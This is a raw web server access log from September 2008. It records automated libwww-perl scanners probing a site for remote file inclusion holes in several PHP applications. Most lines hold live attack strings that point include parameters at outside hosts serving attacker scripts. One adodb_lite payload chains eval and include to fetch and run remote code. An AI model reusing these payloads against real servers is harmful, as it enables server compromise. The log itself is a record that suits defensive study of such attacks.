66.249.129.210 - - [04/Sep/2008:23:56:38 -0700] "GET /logs/access_080815.log//ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://www.rockwellpta.org/fav.ico?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.jainvestigation.com"
66.249.129.210 - - [04/Sep/2008:23:56:38 -0700] "GET //ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://www.rockwellpta.org/fav.ico?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.jainvestigation.com"
66.249.129.210 - - [04/Sep/2008:23:56:38 -0700] "GET /logs//ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://www.rockwellpta.org/fav.ico?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.jainvestigation.com"
74.55.98.10 - - [04/Sep/2008:23:56:38 -0700] "GET /logs/access_080815.log//ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://www.rockwellpta.org/fav.ico?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.jainvestigation.com"
74.55.98.10 - - [04/Sep/2008:23:57:12 -0700] "GET //ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://www.rockwellpta.org/fav.ico?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.jainvestigation.com"
74.55.98.10 - - [04/Sep/2008:23:56:38 -0700] "GET /logs//ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://www.rockwellpta.org/fav.ico?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.jainvestigation.com"
66.249.129.210 - - [04/Sep/2008:23:56:39 -0700] "GET /logs/access_080825.log/My_eGallery/public/mainGallery.php?basepath=http://www.rockwellpta.org/fav.ico?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.jainvestigation.com"
66.249.129.210 - - [04/Sep/2008:23:56:39 -0700] "GET /My_eGallery/public/mainGallery.php?basepath=http://www.rockwellpta.org/fav.ico?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.jainvestigation.com"
66.249.129.210 - - [04/Sep/2008:23:56:39 -0700] "GET /logs/My_eGallery/public/mainGallery.php?basepath=http://www.rockwellpta.org/fav.ico?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.jainvestigation.com"
74.55.98.10 - - [04/Sep/2008:23:56:40 -0700] "GET /logs/access_080825.log/My_eGallery/public/mainGallery.php?basepath=http://www.rockwellpta.org/fav.ico?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.jainvestigation.com"
74.55.98.10 - - [04/Sep/2008:23:56:40 -0700] "GET /My_eGallery/public/mainGallery.php?basepath=http://www.rockwellpta.org/fav.ico?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.jainvestigation.com"
74.55.98.10 - - [04/Sep/2008:23:56:40 -0700] "GET /logs/My_eGallery/public/mainGallery.php?basepath=http://www.rockwellpta.org/fav.ico?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.jainvestigation.com"
74.55.98.10 - - [04/Sep/2008:23:56:42 -0700] "GET /logs/access_080815.log//ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://www.rockwellpta.org/fav.ico?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.jainvestigation.com"
74.55.98.10 - - [04/Sep/2008:23:56:43 -0700] "GET //ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://www.rockwellpta.org/fav.ico?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.jainvestigation.com"
74.55.98.10 - - [04/Sep/2008:23:56:43 -0700] "GET /logs//ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://www.rockwellpta.org/fav.ico?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.jainvestigation.com"
74.55.98.10 - - [04/Sep/2008:23:56:43 -0700] "GET /logs/access_080815.log//ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://www.rockwellpta.org/fav.ico?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.jainvestigation.com"
74.55.98.10 - - [04/Sep/2008:23:56:43 -0700] "GET //ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://www.rockwellpta.org/fav.ico?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.jainvestigation.com"
74.55.98.10 - - [04/Sep/2008:23:56:44 -0700] "GET /logs//ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://www.rockwellpta.org/fav.ico?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.jainvestigation.com"
66.249.129.210 - - [04/Sep/2008:23:56:44 -0700] "GET /logs/access_080728.log//ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://www.rockwellpta.org/fav.ico?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.jainvestigation.com"
66.249.129.210 - - [04/Sep/2008:23:56:45 -0700] "GET /logs/access_080728.log//ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://www.rockwellpta.org/fav.ico?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.jainvestigation.com"
66.249.129.210 - - [04/Sep/2008:23:56:47 -0700] "GET /logs/access_080728.log//ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://www.rockwellpta.org/fav.ico?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.jainvestigation.com"
74.55.98.10 - - [04/Sep/2008:23:56:47 -0700] "GET /logs/access_080728.log//ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://www.rockwellpta.org/fav.ico?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.jainvestigation.com"
74.55.98.10 - - [04/Sep/2008:23:57:21 -0700] "GET /logs/access_080815.log//ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://www.rockwellpta.org/fav.ico?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.jainvestigation.com"
74.55.98.10 - - [04/Sep/2008:23:56:47 -0700] "GET //ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://www.rockwellpta.org/fav.ico?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.jainvestigation.com"
74.55.98.10 - - [04/Sep/2008:23:56:48 -0700] "GET /logs//ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://www.rockwellpta.org/fav.ico?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.jainvestigation.com"
74.55.98.10 - - [04/Sep/2008:23:56:51 -0700] "GET /logs/access_080815.log//ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://www.rockwellpta.org/fav.ico?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.jainvestigation.com"
74.55.98.10 - - [04/Sep/2008:23:56:51 -0700] "GET //ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://www.rockwellpta.org/fav.ico?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.jainvestigation.com"
74.55.98.10 - - [04/Sep/2008:23:56:51 -0700] "GET /logs//ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://www.rockwellpta.org/fav.ico?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.jainvestigation.com"
74.55.98.10 - - [04/Sep/2008:23:56:51 -0700] "GET /logs/access_080728.log//ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://www.rockwellpta.org/fav.ico?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.jainvestigation.com"
74.55.98.10 - - [04/Sep/2008:23:56:53 -0700] "GET /logs/access_080728.log//ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://www.rockwellpta.org/fav.ico?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.jainvestigation.com"
74.53.70.178 - - [04/Sep/2008:23:56:53 -0700] "GET /logs/access_080825.log/My_eGallery/public/mainGallery.php?basepath=http://www.rockwellpta.org/fav.ico?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.jainvestigation.com"
74.53.70.178 - - [04/Sep/2008:23:56:53 -0700] "GET /My_eGallery/public/mainGallery.php?basepath=http://www.rockwellpta.org/fav.ico?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.jainvestigation.com"
74.53.70.178 - - [04/Sep/2008:23:56:53 -0700] "GET /logs/My_eGallery/public/mainGallery.php?basepath=http://www.rockwellpta.org/fav.ico?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.jainvestigation.com"
74.55.98.10 - - [04/Sep/2008:23:56:56 -0700] "GET /logs/access_080728.log//ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://www.rockwellpta.org/fav.ico?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.jainvestigation.com"
74.53.70.178 - - [04/Sep/2008:23:56:59 -0700] "GET /logs/access_080825.log/My_eGallery/public/mainGallery.php?basepath=http://www.on-linegames.com/arcade/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.jainvestigation.com"
74.53.70.178 - - [04/Sep/2008:23:56:59 -0700] "GET /My_eGallery/public/mainGallery.php?basepath=http://www.on-linegames.com/arcade/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.jainvestigation.com"
74.53.70.178 - - [04/Sep/2008:23:56:59 -0700] "GET /logs/My_eGallery/public/mainGallery.php?basepath=http://www.on-linegames.com/arcade/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.jainvestigation.com"
74.55.98.10 - - [04/Sep/2008:23:57:00 -0700] "GET /logs/access_080728.log//ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://www.rockwellpta.org/fav.ico?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.jainvestigation.com"
74.53.70.178 - - [04/Sep/2008:23:57:00 -0700] "GET /logs/access_080815.log//ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://www.rockwellpta.org/fav.ico?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.jainvestigation.com"
74.53.70.178 - - [04/Sep/2008:23:57:00 -0700] "GET //ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://www.rockwellpta.org/fav.ico?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.jainvestigation.com"
74.53.70.178 - - [04/Sep/2008:23:57:01 -0700] "GET /logs//ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://www.rockwellpta.org/fav.ico?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.jainvestigation.com"
74.53.70.178 - - [04/Sep/2008:23:57:09 -0700] "GET /logs/access_080728.log//ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://www.rockwellpta.org/fav.ico?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.jainvestigation.com"
74.53.70.178 - - [04/Sep/2008:23:57:09 -0700] "GET /logs/access_080815.log//ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://www.on-linegames.com/arcade/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.jainvestigation.com"
74.53.70.178 - - [04/Sep/2008:23:57:09 -0700] "GET //ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://www.on-linegames.com/arcade/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.jainvestigation.com"
74.53.70.178 - - [04/Sep/2008:23:57:09 -0700] "GET /logs//ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://www.on-linegames.com/arcade/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.jainvestigation.com"
205.234.130.236 - - [04/Sep/2008:23:57:11 -0700] "GET /logs/access.log/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.setteb.it/chi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.jainvestigation.com"
205.234.130.236 - - [04/Sep/2008:23:57:12 -0700] "GET /lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.setteb.it/chi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.jainvestigation.com"
205.234.130.236 - - [04/Sep/2008:23:57:12 -0700] "GET /logs/access.log/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.setteb.it/chi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.jainvestigation.com"
205.234.130.236 - - [04/Sep/2008:23:57:12 -0700] "GET /logs/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.setteb.it/chi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.jainvestigation.com"
205.234.130.236 - - [04/Sep/2008:23:57:12 -0700] "GET /lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.setteb.it/chi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.jainvestigation.com"
205.234.130.236 - - [04/Sep/2008:23:57:12 -0700] "GET /logs/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.setteb.it/chi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.jainvestigation.com"
74.53.70.178 - - [04/Sep/2008:23:57:18 -0700] "GET /logs/access_080728.log//ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://www.on-linegames.com/arcade/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.jainvestigation.com"
216.17.96.15 - - [04/Sep/2008:23:57:52 -0700] "GET /logs/access.log//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.lacdessapins.fr/includes/idv5priv.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.jainvestigation.com"
216.17.96.15 - - [04/Sep/2008:23:57:19 -0700] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.lacdessapins.fr/includes/idv5priv.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.jainvestigation.com"
216.17.96.15 - - [04/Sep/2008:23:57:19 -0700] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.lacdessapins.fr/includes/idv5priv.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.jainvestigation.com"
216.17.96.15 - - [04/Sep/2008:23:57:56 -0700] "GET /logs/access.log//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.lacdessapins.fr/includes/idv5priv.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.jainvestigation.com"
216.17.96.15 - - [04/Sep/2008:23:57:23 -0700] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.lacdessapins.fr/includes/idv5priv.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.jainvestigation.com"
216.17.96.15 - - [04/Sep/2008:23:57:23 -0700] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.lacdessapins.fr/includes/idv5priv.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.jainvestigation.com"
216.17.96.15 - - [04/Sep/2008:23:57:30 -0700] "GET /logs/access_080825.log//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.lacdessapins.fr/includes/idv5priv.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.jainvestigation.com"
216.17.96.15 - - [04/Sep/2008:23:58:06 -0700] "GET /logs/access_080825.log//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.lacdessapins.fr/includes/idv5priv.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.jainvestigation.com"
74.53.70.178 - - [04/Sep/2008:23:57:46 -0700] "GET /logs/access.log/?basepath=http://www.rockwellpta.org/fav.ico?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "jainvestigation.com"
74.53.70.178 - - [04/Sep/2008:23:57:46 -0700] "GET /?basepath=http://www.rockwellpta.org/fav.ico?? HTTP/1.1" 200 916 "-" "libwww-perl/5.79" "jainvestigation.com"
74.53.70.178 - - [04/Sep/2008:23:57:46 -0700] "GET /logs/?basepath=http://www.rockwellpta.org/fav.ico?? HTTP/1.1" 200 1939 "-" "libwww-perl/5.79" "jainvestigation.com"
74.6.17.157 - - [04/Sep/2008:23:58:51 -0700] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "jainvestigation.com"
74.6.17.157 - - [04/Sep/2008:23:58:51 -0700] "GET /logs/access_080608.log HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "jainvestigation.com"
43.244.132.32 - - [04/Sep/2008:23:59:08 -0700] "GET //templates/mangobery/footer.sample.php?Site_Path=http://seolinks.karpiknet.com/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.802" "jainvestigation.com"
205.234.130.236 - - [04/Sep/2008:23:59:14 -0700] "GET /logs/access_080825.log/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.setteb.it/chi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.jainvestigation.com"
74.55.98.10 - - [04/Sep/2008:23:59:19 -0700] "GET /logs/access_080815.log//ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://www.rockwellpta.org/fav.ico?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.jainvestigation.com"
74.55.98.10 - - [04/Sep/2008:23:59:19 -0700] "GET //ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://www.rockwellpta.org/fav.ico?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.jainvestigation.com"
74.55.98.10 - - [04/Sep/2008:23:59:19 -0700] "GET /logs//ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://www.rockwellpta.org/fav.ico?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.jainvestigation.com"
74.55.98.10 - - [04/Sep/2008:23:59:28 -0700] "GET /logs/access_080815.log//ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://www.rockwellpta.org/fav.ico?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.jainvestigation.com"
74.55.98.10 - - [04/Sep/2008:23:59:28 -0700] "GET //ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://www.rockwellpta.org/fav.ico?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.jainvestigation.com"
74.55.98.10 - - [04/Sep/2008:23:59:28 -0700] "GET /logs//ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://www.rockwellpta.org/fav.ico?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.jainvestigation.com"
74.55.98.10 - - [04/Sep/2008:23:59:29 -0700] "GET /logs/access_080815.log//ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://www.rockwellpta.org/fav.ico?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.jainvestigation.com"
74.55.98.10 - - [04/Sep/2008:23:59:29 -0700] "GET //ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://www.rockwellpta.org/fav.ico?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.jainvestigation.com"
74.55.98.10 - - [04/Sep/2008:23:59:29 -0700] "GET /logs//ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://www.rockwellpta.org/fav.ico?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.jainvestigation.com"
66.249.129.210 - - [04/Sep/2008:23:59:30 -0700] "GET /logs/access_080815.log//ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://www.rockwellpta.org/fav.ico?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.jainvestigation.com"
66.249.129.210 - - [04/Sep/2008:23:59:30 -0700] "GET //ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://www.rockwellpta.org/fav.ico?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.jainvestigation.com"
66.249.129.210 - - [04/Sep/2008:23:59:30 -0700] "GET /logs//ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://www.rockwellpta.org/fav.ico?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.jainvestigation.com"
74.55.98.10 - - [04/Sep/2008:23:59:30 -0700] "GET /logs/access_080815.log//ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://www.rockwellpta.org/fav.ico?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.jainvestigation.com"
74.55.98.10 - - [04/Sep/2008:23:59:30 -0700] "GET /logs/access_080815.log//ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://www.rockwellpta.org/fav.ico?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.jainvestigation.com"
74.55.98.10 - - [04/Sep/2008:23:59:30 -0700] "GET //ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://www.rockwellpta.org/fav.ico?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.jainvestigation.com"
74.55.98.10 - - [04/Sep/2008:23:59:30 -0700] "GET //ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://www.rockwellpta.org/fav.ico?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.jainvestigation.com"
74.55.98.10 - - [05/Sep/2008:00:00:04 -0700] "GET /logs//ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://www.rockwellpta.org/fav.ico?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.jainvestigation.com"
74.55.98.10 - - [04/Sep/2008:23:59:30 -0700] "GET /logs//ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://www.rockwellpta.org/fav.ico?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.jainvestigation.com"
66.249.129.210 - - [04/Sep/2008:23:59:33 -0700] "GET /logs/access_080815.log//ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://www.rockwellpta.org/fav.ico?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.jainvestigation.com"
66.249.129.210 - - [04/Sep/2008:23:59:33 -0700] "GET //ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://www.rockwellpta.org/fav.ico?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.jainvestigation.com"
66.249.129.210 - - [04/Sep/2008:23:59:33 -0700] "GET /logs//ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://www.rockwellpta.org/fav.ico?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.jainvestigation.com"
66.249.129.210 - - [04/Sep/2008:23:59:34 -0700] "GET /logs/access_080815.log//ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://www.rockwellpta.org/fav.ico?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.jainvestigation.com"
66.249.129.210 - - [04/Sep/2008:23:59:34 -0700] "GET //ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://www.rockwellpta.org/fav.ico?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.jainvestigation.com"
66.249.129.210 - - [04/Sep/2008:23:59:34 -0700] "GET /logs//ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://www.rockwellpta.org/fav.ico?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.jainvestigation.com"
205.234.130.236 - - [04/Sep/2008:23:59:34 -0700] "GET /logs/access_080825.log/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.setteb.it/chi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.jainvestigation.com"
24.242.184.98 - - [04/Sep/2008:23:59:42 -0700] "GET /logs/access_080815.log//ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://www.rockwellpta.org/fav.ico?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.jainvestigation.com"
24.242.184.98 - - [04/Sep/2008:23:59:42 -0700] "GET //ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://www.rockwellpta.org/fav.ico?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.jainvestigation.com"
24.242.184.98 - - [04/Sep/2008:23:59:43 -0700] "GET /logs//ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://www.rockwellpta.org/fav.ico?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.jainvestigation.com"
74.53.70.178 - - [05/Sep/2008:00:00:03 -0700] "GET /logs/access_080815.log//ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://www.rockwellpta.org/fav.ico?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.jainvestigation.com"
74.53.70.178 - - [05/Sep/2008:00:00:03 -0700] "GET //ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://www.rockwellpta.org/fav.ico?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.jainvestigation.com"
74.53.70.178 - - [05/Sep/2008:00:00:03 -0700] "GET /logs//ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://www.rockwellpta.org/fav.ico?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.jainvestigation.com"
74.53.70.178 - - [05/Sep/2008:00:00:50 -0700] "GET /logs/access_080815.log//ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://www.on-linegames.com/arcade/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.jainvestigation.com"
74.53.70.178 - - [05/Sep/2008:00:00:50 -0700] "GET //ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://www.on-linegames.com/arcade/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.jainvestigation.com"
74.53.70.178 - - [05/Sep/2008:00:00:50 -0700] "GET /logs//ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://www.on-linegames.com/arcade/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.jainvestigation.com"
74.55.98.10 - - [05/Sep/2008:00:01:14 -0700] "GET /logs/access_080825.log//ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://www.rockwellpta.org/fav.ico?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.jainvestigation.com"
74.55.98.10 - - [05/Sep/2008:00:01:15 -0700] "GET /logs/access_080825.log//ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://www.rockwellpta.org/fav.ico?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.jainvestigation.com"
74.55.98.10 - - [05/Sep/2008:00:01:16 -0700] "GET /logs/access_080825.log//ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://www.rockwellpta.org/fav.ico?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.jainvestigation.com"
74.55.98.10 - - [05/Sep/2008:00:01:20 -0700] "GET /logs/access_080825.log//ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://www.rockwellpta.org/fav.ico?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.jainvestigation.com"
74.55.98.10 - - [05/Sep/2008:00:01:20 -0700] "GET /logs/access_080825.log//ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://www.rockwellpta.org/fav.ico?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.jainvestigation.com"
66.249.129.210 - - [05/Sep/2008:00:01:24 -0700] "GET /logs/access_080825.log//ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://www.rockwellpta.org/fav.ico?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.jainvestigation.com"
66.249.129.210 - - [05/Sep/2008:00:01:27 -0700] "GET /logs/access_080825.log//ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://www.rockwellpta.org/fav.ico?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.jainvestigation.com"
66.249.129.210 - - [05/Sep/2008:00:01:32 -0700] "GET /logs/access_080825.log//ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://www.rockwellpta.org/fav.ico?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.jainvestigation.com"
74.53.70.178 - - [05/Sep/2008:00:01:50 -0700] "GET /logs/access.log/?basepath=http://www.on-linegames.com/arcade/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "jainvestigation.com"
